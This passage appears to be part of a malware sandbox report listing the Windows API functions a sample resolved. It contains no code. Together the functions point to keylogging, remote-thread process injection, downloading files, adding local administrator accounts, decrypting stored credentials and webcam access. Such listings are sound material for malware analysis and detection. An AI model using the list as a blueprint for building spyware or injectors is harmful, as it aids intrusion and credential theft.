- "kernel32.dll.SetFileInformationByHandle",
- "shell32.dll.SHGetFolderPathW",
- "kernel32.dll.GetModuleHandleW",
- "advapi32.dll.AddMandatoryAce",
- "ntmarta.dll.GetMartaExtensionInterface",
- "ws2_32.dll.accept",
- "ws2_32.dll.bind",
- "ws2_32.dll.closesocket",
- "ws2_32.dll.connect",
- "ws2_32.dll.getpeername",
- "ws2_32.dll.getsockname",
- "ws2_32.dll.getsockopt",
- "ws2_32.dll.ntohl",
- "ws2_32.dll.htonl",
- "ws2_32.dll.htons",
- "ws2_32.dll.inet_addr",
- "ws2_32.dll.inet_ntoa",
- "ws2_32.dll.ioctlsocket",
- "ws2_32.dll.listen",
- "ws2_32.dll.ntohs",
- "ws2_32.dll.recv",
- "ws2_32.dll.recvfrom",
- "ws2_32.dll.select",
- "ws2_32.dll.send",
- "ws2_32.dll.sendto",
- "ws2_32.dll.setsockopt",
- "ws2_32.dll.shutdown",
- "ws2_32.dll.socket",
- "ws2_32.dll.gethostbyname",
- "ws2_32.dll.gethostname",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.WSAGetLastError",
- "ws2_32.dll.WSASetLastError",
- "ws2_32.dll.WSAStartup",
- "ws2_32.dll.WSACleanup",
- "ws2_32.dll.__WSAFDIsSet",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.getnameinfo",
- "ws2_32.dll.WSALookupServiceBeginW",
- "ws2_32.dll.WSALookupServiceNextW",
- "ws2_32.dll.WSALookupServiceEnd",
- "ws2_32.dll.WSANSPIoctl",
- "ws2_32.dll.WSAStringToAddressA",
- "ws2_32.dll.WSAStringToAddressW",
- "ws2_32.dll.WSAAddressToStringA",
- "dnsapi.dll.DnsGetProxyInformation",
- "dnsapi.dll.DnsFreeProxyName",
- "iphlpapi.dll.GetIpForwardTable2",
- "iphlpapi.dll.FreeMibTable",
- "iphlpapi.dll.GetIfEntry2",
- "iphlpapi.dll.ConvertInterfaceGuidToLuid",
- "iphlpapi.dll.ResolveIpNetEntry2",
- "iphlpapi.dll.GetIpNetEntry2",
- "shlwapi.dll.#260",
- "rasapi32.dll.RasConnectionNotificationW",
- "rasapi32.dll.RasEnumEntriesW",
- "rtutils.dll.TracePrintfExA",
- "sechost.dll.ConvertSidToStringSidW",
- "profapi.dll.#104",
- "shlwapi.dll.PathCanonicalizeW",
- "shlwapi.dll.PathRemoveFileSpecW",
- "shlwapi.dll.PathFindFileNameW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036",
- "sensapi.dll.IsNetworkAlive",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.NdrClientCall2",
- "kernel32.dll.TerminateThread",
- "kernel32.dll.CreateThread",
- "kernel32.dll.WriteFile",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.ReadFile",
- "kernel32.dll.FindFirstFileA",
- "kernel32.dll.GetBinaryTypeW",
- "kernel32.dll.FindNextFileA",
- "kernel32.dll.GetFullPathNameA",
- "kernel32.dll.GetTempPathW",
- "kernel32.dll.GetPrivateProfileStringW",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.SetCurrentDirectoryW",
- "kernel32.dll.LocalFree",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.FreeLibrary",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.WaitForMultipleObjects",
- "kernel32.dll.CreatePipe",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.SetEvent",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.CreateEventA",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.LoadResource",
- "kernel32.dll.FindResourceW",
- "kernel32.dll.HeapFree",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFilePointer",
- "kernel32.dll.GetLogicalDriveStringsW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.ReleaseMutex",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.CreateProcessA",
- "kernel32.dll.SizeofResource",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.GetSystemDirectoryW",
- "kernel32.dll.LockResource",
- "kernel32.dll.GetWindowsDirectoryW",
- "kernel32.dll.IsWow64Process",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.Process32First",
- "kernel32.dll.WriteProcessMemory",
- "kernel32.dll.Process32Next",
- "kernel32.dll.GetWindowsDirectoryA",
- "kernel32.dll.VirtualProtectEx",
- "kernel32.dll.VirtualAllocEx",
- "kernel32.dll.CreateRemoteThread",
- "kernel32.dll.WinExec",
- "kernel32.dll.GetTempPathA",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.lstrcmpW",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.lstrcpyW",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.lstrcpyA",
- "kernel32.dll.Sleep",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.lstrcatA",
- "kernel32.dll.lstrcmpA",
- "kernel32.dll.lstrlenA",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.lstrlenW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.lstrcatW",
- "kernel32.dll.GetLastError",
- "kernel32.dll.SetLastError",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.GetComputerNameW",
- "user32.dll.MessageBoxA",
- "user32.dll.GetKeyState",
- "user32.dll.GetMessageA",
- "user32.dll.DispatchMessageA",
- "user32.dll.CreateWindowExW",
- "user32.dll.CallNextHookEx",
- "user32.dll.GetAsyncKeyState",
- "user32.dll.wsprintfW",
- "user32.dll.wsprintfA",
- "user32.dll.GetLastInputInfo",
- "user32.dll.GetWindowTextW",
- "user32.dll.RegisterClassW",
- "user32.dll.GetRawInputData",
- "user32.dll.TranslateMessage",
- "user32.dll.GetForegroundWindow",
- "user32.dll.DefWindowProcA",
- "user32.dll.RegisterRawInputDevices",
- "user32.dll.MapVirtualKeyA",
- "user32.dll.ToUnicode",
- "user32.dll.GetKeyNameTextW",
- "user32.dll.PostQuitMessage",
- "advapi32.dll.RegDeleteKeyA",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.RegDeleteKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegQueryValueExW",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.ChangeServiceConfigW",
- "advapi32.dll.QueryServiceConfigW",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.LookupAccountSidW",
- "advapi32.dll.FreeSid",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.RegDeleteValueW",
- "advapi32.dll.RegSetValueExA",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegQueryValueExA",
- "shell32.dll.ShellExecuteExA",
- "shell32.dll.ShellExecuteExW",
- "shell32.dll.SHGetSpecialFolderPathW",
- "shell32.dll.SHCreateDirectoryExW",
- "shell32.dll.ShellExecuteW",
- "urlmon.dll.URLDownloadToFileW",
- "ole32.dll.CoInitialize",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CoTaskMemFree",
- "ole32.dll.CoUninitialize",
- "shlwapi.dll.StrStrA",
- "shlwapi.dll.StrStrW",
- "shlwapi.dll.PathFindExtensionW",
- "shlwapi.dll.PathCombineA",
- "shlwapi.dll.PathFileExistsW",
- "shlwapi.dll.PathRemoveFileSpecA",
- "netapi32.dll.NetUserAdd",
- "netapi32.dll.NetLocalGroupAddMembers",
- "crypt32.dll.CryptStringToBinaryA",
- "crypt32.dll.CryptUnprotectData",
- "psapi.dll.GetModuleFileNameExW",
- "wininet.dll.InternetQueryDataAvailable",
- "wininet.dll.InternetOpenUrlW",
- "wininet.dll.InternetOpenW",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetCheckConnectionW",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "wintrust.dll.WinVerifyTrust",
- "msdmo.dll.DMOEnum",
- "msdmo.dll.DMOGetTypes",
- "msdmo.dll.DMOGetName",
- "avicap32.dll.capGetDriverDescriptionW",
- "ole32.dll.CoTaskMemAlloc",
- "ole32.dll.CoInitializeEx",
- "ole32.dll.CreateBindCtx",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "comctl32.dll.#236",
- "oleaut32.dll.#6",
- "ole32.dll.CoGetMalloc",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "oleaut32.dll.#2",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "oleaut32.dll.#500",
- "rpcrt4.dll.RpcBindingFree",
- "advapi32.dll.UnregisterTraceGuids",
- "oleaut32.dll.#9",
- "comctl32.dll.#321",
- "shell32.dll.#66",
- "advapi32.dll.SetEntriesInAclW",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#332",
- "comctl32.dll.#338",
- "comctl32.dll.#339",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "shell32.dll.#102",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "comctl32.dll.#386",
- "apphelp.dll.ApphelpCheckShellObject",
- "comctl32.dll.#385",
- "comctl32.dll.#336",
- "comctl32.dll.#329",
- "comctl32.dll.#333",
- "ntdll.dll.RtlDllShutdownInProgress",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "linkinfo.dll.CreateLinkInfoW",
- "user32.dll.IsCharAlphaW",
- "user32.dll.CharPrevW",
- "ntshrui.dll.GetNetResourceFromLocalPathW",
- "srvcli.dll.NetShareEnum",
- "cscapi.dll.CscNetApiGetInterface",
- "slc.dll.SLGetWindowsInformationDWORD",
- "linkinfo.dll.DestroyLinkInfo",
- "propsys.dll.PropVariantToBoolean",
- "ole32.dll.PropVariantClear",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "cryptsp.dll.CryptReleaseContext",
- "advapi32.dll.RegEnumValueW",
- "kernel32.dll.QueryActCtxW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.FlsFree",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "kernel32.dll.IsProcessorFeaturePresent",
- "msvcrt.dll._set_error_mode",
- "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "mscoree.dll.GetProcessExecutableHeap",
- "mscorwks.dll.DllGetClassObjectInternal",
- "mscorwks.dll.GetCLRFunction",
- "advapi32.dll.RegisterTraceGuidsW",
- "advapi32.dll.GetTraceLoggerHandle",
- "advapi32.dll.GetTraceEnableLevel",
- "advapi32.dll.GetTraceEnableFlags",
- "advapi32.dll.TraceEvent",
- "mscoree.dll.IEE",
- "mscorwks.dll.IEE",
- "mscoree.dll.GetStartupFlags",
- "mscoree.dll.GetHostConfigurationFile",
- "mscoree.dll.GetCORSystemDirectory",
- "ntdll.dll.RtlUnwind",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAce",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.AddVectoredContinueHandler",
- "kernel32.dll.RemoveVectoredContinueHandler",
- "advapi32.dll.ConvertSidToStringSidW",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.GetWriteWatch",
- "kernel32.dll.ResetWriteWatch",
- "kernel32.dll.CreateMemoryResourceNotification",
- "kernel32.dll.QueryMemoryResourceNotification",
- "mscoree.dll._CorExeMain",
- "mscoree.dll._CorImageUnloading",
- "mscoree.dll._CorValidateImage",
- "oleaut32.dll.#149",
- "kernel32.dll.GetUserDefaultUILanguage",
- "ole32.dll.CoGetContextToken",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GetFileAttributesExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "kernel32.dll.lstrlen",
- "mscoree.dll.ND_RI2",
- "kernel32.dll.lstrcpy",
- "version.dll.VerLanguageNameW",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetModuleInformation",
- "psapi.dll.GetModuleBaseNameW",
- "kernel32.dll.GetExitCodeProcess",
- "ntdll.dll.NtQuerySystemInformation",
- "user32.dll.EnumWindows",
- "user32.dll.GetWindowThreadProcessId",
- "user32.dll.GetWindow",
- "user32.dll.IsWindowVisible",
- "kernel32.dll.WerSetFlags",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.GetEnvironmentVariableW",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptVerifySignatureA",
- "advapi32.dll.CryptSignHashA",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptEnumProvidersA",
- "cryptsp.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptImportKey",
- "cryptsp.dll.CryptExportKey",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "mscoree.dll.GetTokenForVTableEntry",
- "mscoree.dll.SetTargetForVTableEntry",
- "mscoree.dll.GetTargetForVTableEntry",
- "culture.dll.ConvertLangIdToCultureName",
- "ole32.dll.CoCreateGuid",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.LocalAlloc",
- "mscoree.dll.ND_RI4",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetConsoleTitleW",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.CreateEventW",
- "ntdll.dll.WinSqmIsOptedIn",
- "shfolder.dll.SHGetFolderPathW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.GetACP",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.GetFileType",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.SwitchToThread",
- "kernel32.dll.GlobalMemoryStatusEx",
- "secur32.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.ReportEventW",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.GetVolumeInformationW",
- "mscorjit.dll.getJit",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.FindClose",
- "mscoree.dll.DllGetClassObject",
- "diasymreader.dll.DllGetClassObjectInternal",
- "kernel32.dll.GetConsoleOutputCP",
- "gdi32.dll.TranslateCharsetInfo",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.WriteConsoleW",
- "mscoree.dll.CorExitProcess",
- "mscorwks.dll.CorExitProcess",
- "mscorwks.dll._CorDllMain",
- "kernel32.dll.CreateActCtxW",
- "kernel32.dll.AddRefActCtx",
- "kernel32.dll.ReleaseActCtx",
- "kernel32.dll.ActivateActCtx",
- "kernel32.dll.DeactivateActCtx",
- "kernel32.dll.GetCurrentActCtx",
- "netutils.dll.NetApiBufferFree",
- "rtutils.dll.TraceRegisterExA",
- "ntdll.dll.RtlGetVersion",
- "ntdll.dll.NtOpenKey",
- "ntdll.dll.wcscat_s",
- "ntdll.dll.wcscpy_s",
- "ntdll.dll.NtEnumerateKey",
- "ntdll.dll.RtlOpenCurrentUser",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlAllocateHeap",
- "ntdll.dll.memcpy",
- "ntdll.dll.memset",
- "ntdll.dll.RtlEnterCriticalSection",
- "ntdll.dll.RtlLeaveCriticalSection",
- "ntdll.dll.RtlUnicodeToMultiByteN",
- "ntdll.dll.RtlMultiByteToUnicodeN",
- "ntdll.dll.RtlReleaseActivationContext",
- "ntdll.dll.RtlFindActivationContextSectionString",
- "ntdll.dll.RtlDeactivateActivationContextUnsafeFast",
- "ntdll.dll.RtlActivateActivationContextUnsafeFast",
- "ntdll.dll.wcstol",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.NtQuerySecurityObject",
- "ntdll.dll.NtSetSecurityObject",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlInitAnsiString",
- "ntdll.dll.RtlCreateUnicodeStringFromAsciiz",
- "ntdll.dll.RtlQueryInformationActiveActivationContext",
- "ntdll.dll._vsnwprintf",
- "ntdll.dll.NtVdmControl",
- "ntdll.dll.wcstoul",
- "ntdll.dll.NtOpenDirectoryObject",
- "ntdll.dll.NtDeleteValueKey",
- "ntdll.dll.NtSetValueKey",
- "ntdll.dll.NtCreateKey",
- "ntdll.dll.NtYieldExecution",
- "ntdll.dll.RtlIsThreadWithinLoaderCallout",
- "ntdll.dll._wcsicmp",
- "ntdll.dll._stricmp",
- "ntdll.dll.RtlGetIntegerAtom",
- "ntdll.dll.NtProtectVirtualMemory",
- "ntdll.dll.RtlRetrieveNtUserPfn",
- "ntdll.dll.RtlInitializeNtUserPfn",
- "ntdll.dll.RtlDeleteCriticalSection",
- "ntdll.dll.RtlInitializeCriticalSection",
- "ntdll.dll._allshr",
- "ntdll.dll.RtlUnicodeToMultiByteSize",
- "ntdll.dll._allmul",
- "ntdll.dll.NtCallbackReturn",
- "ntdll.dll._chkstk",
- "ntdll.dll.memmove",
- "ntdll.dll.NtQueryInformationToken",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.RtlNtStatusToDosError",
- "ntdll.dll.CsrClientCallServer",
- "ntdll.dll.CsrFreeCaptureBuffer",
- "ntdll.dll.CsrCaptureMessageBuffer",
- "ntdll.dll.CsrAllocateCaptureBuffer",
- "ntdll.dll.RtlFreeSid",
- "ntdll.dll.RtlAllocateAndInitializeSid",
- "ntdll.dll.CsrAllocateMessagePointer",
- "ntdll.dll.RtlReAllocateHeap",
- "ntdll.dll.RtlRunDecodeUnicodeString",
- "ntdll.dll.RtlRunEncodeUnicodeString",
- "ntdll.dll.RtlGetThreadLangIdByIndex",
- "ntdll.dll.RtlSizeHeap",
- "ntdll.dll.strcpy_s",
- "ntdll.dll.sscanf_s",
- "ntdll.dll.strrchr",
- "ntdll.dll.RtlIsNameLegalDOS8Dot3",
- "ntdll.dll.wcsncat_s",
- "ntdll.dll.NtRaiseHardError",
- "ntdll.dll.RtlMultiByteToUnicodeSize",
- "ntdll.dll.RtlCheckRegistryKey",
- "ntdll.dll.LdrFlushAlternateResourceModules",
- "ntdll.dll.qsort",
- "ntdll.dll.iswspace",
- "ntdll.dll.wcsncpy_s",
- "ntdll.dll.wcsrchr",
- "ntdll.dll._alldiv",
- "ntdll.dll._wtoi",
- "ntdll.dll._aulldvrm",
- "ntdll.dll.NlsAnsiCodePage",
- "ntdll.dll.RtlImageNtHeader",
- "ntdll.dll.RtlSetLastWin32Error",
- "ntdll.dll.NtClose",
- "ntdll.dll.NtQueryValueKey",
- "ntdll.dll.swprintf_s",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlUnicodeStringToInteger",
- "gdi32.dll.GetClipRgn",
- "gdi32.dll.ExtSelectClipRgn",
- "gdi32.dll.GetHFONT",
- "gdi32.dll.GetMapMode",
- "gdi32.dll.SetGraphicsMode",
- "gdi32.dll.GetClipBox",
- "gdi32.dll.CreateRectRgn",
- "gdi32.dll.CreateRectRgnIndirect",
- "gdi32.dll.SetLayout",
- "gdi32.dll.GetBoundsRect",
- "gdi32.dll.ExcludeClipRect",
- "gdi32.dll.PlayEnhMetaFile",
- "gdi32.dll.Ellipse",
- "gdi32.dll.CreateEllipticRgn",
- "gdi32.dll.GdiFixUpHandle",
- "gdi32.dll.CreatePen",
- "gdi32.dll.Rectangle",
- "gdi32.dll.GetTextCharacterExtra",
- "gdi32.dll.SetTextCharacterExtra",
- "gdi32.dll.GetCurrentObject",
- "gdi32.dll.GetViewportOrgEx",
- "gdi32.dll.SetViewportOrgEx",
- "gdi32.dll.PolyPatBlt",
- "gdi32.dll.CreateBrushIndirect",
- "gdi32.dll.SetBoundsRect",
- "gdi32.dll.CopyEnhMetaFileW",
- "gdi32.dll.CopyMetaFileW",
- "gdi32.dll.GetPaletteEntries",
- "gdi32.dll.CreatePalette",
- "gdi32.dll.SetPaletteEntries",
- "gdi32.dll.GetPixel",
- "gdi32.dll.ExtTextOutA",
- "gdi32.dll.GetTextCharsetInfo",
- "gdi32.dll.QueryFontAssocStatus",
- "gdi32.dll.GetCharWidthInfo",
- "gdi32.dll.GetCharWidthA",
- "gdi32.dll.GetTextFaceW",
- "gdi32.dll.GetCharABCWidthsA",
- "gdi32.dll.GetCharABCWidthsW",
- "gdi32.dll.SetBrushOrgEx",
- "gdi32.dll.CreateFontIndirectW",
- "gdi32.dll.EnumFontsW",
- "gdi32.dll.GetTextFaceAliasW",
- "gdi32.dll.GetTextMetricsW",
- "gdi32.dll.GetTextColor",
- "gdi32.dll.GdiGetCodePage",
- "gdi32.dll.GetTextCharset",
- "gdi32.dll.GetBkMode",
- "gdi32.dll.GetViewportExtEx",
- "gdi32.dll.GetWindowExtEx",
- "gdi32.dll.GdiGetCharDimensions",
- "gdi32.dll.GdiPrinterThunk",
- "gdi32.dll.GdiLoadType1Fonts",
- "gdi32.dll.GdiAddFontResourceW",
- "gdi32.dll.SaveDC",
- "gdi32.dll.OffsetWindowOrgEx",
- "gdi32.dll.RestoreDC",
- "gdi32.dll.ExtTextOutW",
- "gdi32.dll.GetDIBits",
- "gdi32.dll.CreateDIBSection",
- "gdi32.dll.SetStretchBltMode",
- "gdi32.dll.SelectPalette",
- "gdi32.dll.RealizePalette",
- "gdi32.dll.SetDIBits",
- "gdi32.dll.CreateDCW",
- "gdi32.dll.CreateDIBitmap",
- "gdi32.dll.CreateCompatibleBitmap",
- "gdi32.dll.SetBitmapBits",
- "gdi32.dll.DeleteDC",
- "gdi32.dll.GdiValidateHandle",
- "gdi32.dll.GdiDllInitialize",
- "gdi32.dll.GdiProcessSetup",
- "gdi32.dll.GetStockObject",
- "gdi32.dll.CreateSolidBrush",
- "gdi32.dll.CreateCompatibleDC",
- "gdi32.dll.GdiConvertBitmapV5",
- "gdi32.dll.GdiCreateLocalEnhMetaFile",
- "gdi32.dll.GdiCreateLocalMetaFilePict",
- "gdi32.dll.GetRgnBox",
- "gdi32.dll.CombineRgn",
- "gdi32.dll.OffsetRgn",
- "gdi32.dll.MirrorRgn",
- "gdi32.dll.EnableEUDC",
- "gdi32.dll.GdiConvertToDevmodeW",
- "gdi32.dll.GetTextExtentPointA",
- "gdi32.dll.GetTextExtentPointW",
- "gdi32.dll.CreateBitmap",
- "gdi32.dll.SetTextAlign",
- "gdi32.dll.GetTextAlign",
- "gdi32.dll.IntersectClipRect",
- "gdi32.dll.SelectObject",
- "gdi32.dll.SetBkMode",
- "gdi32.dll.GetBkColor",
- "gdi32.dll.GetObjectW",
- "gdi32.dll.SetTextColor",
- "gdi32.dll.SetBkColor",
- "gdi32.dll.GetLayout",
- "gdi32.dll.StretchDIBits",
- "gdi32.dll.GetDeviceCaps",
- "gdi32.dll.GetDIBColorTable",
- "gdi32.dll.GdiGetBitmapBitsSize",
- "gdi32.dll.DeleteObject",
- "gdi32.dll.DeleteMetaFile",
- "gdi32.dll.DeleteEnhMetaFile",
- "gdi32.dll.GdiConvertMetaFilePict",
- "gdi32.dll.GdiConvertEnhMetaFile",
- "gdi32.dll.GdiReleaseDC",
- "gdi32.dll.StretchBlt",
- "gdi32.dll.GetObjectType",
- "gdi32.dll.GdiConvertAndCheckDC",
- "gdi32.dll.SetRectRgn",
- "gdi32.dll.BitBlt",
- "gdi32.dll.TextOutW",
- "gdi32.dll.TextOutA",
- "gdi32.dll.PatBlt",
- "gdi32.dll.SetLayoutWidth",
- "kernel32.dll.GetLocaleInfoW",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.LoadLibraryExA",
- "kernel32.dll.InterlockedCompareExchange",
- "kernel32.dll.DelayLoadFailureHook",
- "kernel32.dll.GlobalAddAtomA",
- "kernel32.dll.GlobalFindAtomA",
- "kernel32.dll.QueryPerformanceFrequency",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.CreateFileMappingW",
- "kernel32.dll.MapViewOfFile",
- "kernel32.dll.WerpNotifyLoadStringResource",
- "kernel32.dll.GetSystemDefaultLangID",
- "kernel32.dll.RegQueryInfoKeyW",
- "kernel32.dll.RegEnumValueW",
- "kernel32.dll.RegOpenKeyExW",
- "kernel32.dll.RegQueryValueExW",
- "kernel32.dll.IsDBCSLeadByte",
- "kernel32.dll.WerpNotifyUseStringResource",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.MulDiv",
- "kernel32.dll.GetThreadLocale",
- "kernel32.dll.ConvertDefaultLocale",
- "kernel32.dll.IsValidLocale",
- "kernel32.dll.GetAtomNameW",
- "kernel32.dll.GetAtomNameA",
- "kernel32.dll.AddAtomW",
- "kernel32.dll.AddAtomA",
- "kernel32.dll.EnumResourceNamesExW",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.CompareStringW",
- "kernel32.dll.GetCPInfo",
- "kernel32.dll.GetStringTypeA",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.FoldStringW",
- "kernel32.dll.GlobalHandle",
- "kernel32.dll.GetExitCodeThread",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.GlobalAddAtomW",
- "kernel32.dll.SearchPathW",
- "kernel32.dll.IsDBCSLeadByteEx",
- "kernel32.dll.DisableThreadLibraryCalls",
- "kernel32.dll.FindResourceExA",
- "kernel32.dll.FindResourceExW",
- "kernel32.dll.LoadStringBaseExW",
- "kernel32.dll.RegisterWaitForInputIdle",
- "kernel32.dll.QueryActCtxSettingsW",
- "kernel32.dll.LoadAppInitDlls",
- "kernel32.dll.LocalSize",
- "kernel32.dll.LocalUnlock",
- "kernel32.dll.LocalLock",
- "kernel32.dll.LocalReAlloc",
- "kernel32.dll.InterlockedIncrement",
- "kernel32.dll.RegSetValueExW",
- "kernel32.dll.RegCloseKey",
- "kernel32.dll.RegCreateKeyExW",
- "kernel32.dll.RegDeleteKeyExW",
- "kernel32.dll.GetUserDefaultLCID",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.GlobalSize",
- "kernel32.dll.GlobalDeleteAtom",
- "kernel32.dll.DeleteAtom",
- "kernel32.dll.InterlockedExchange",
- "kernel32.dll.GlobalGetAtomNameA",
- "kernel32.dll.GlobalGetAtomNameW",
- "kernel32.dll.GlobalFree",
- "kernel32.dll.InterlockedDecrement",
- "kernel32.dll.GlobalFlags",
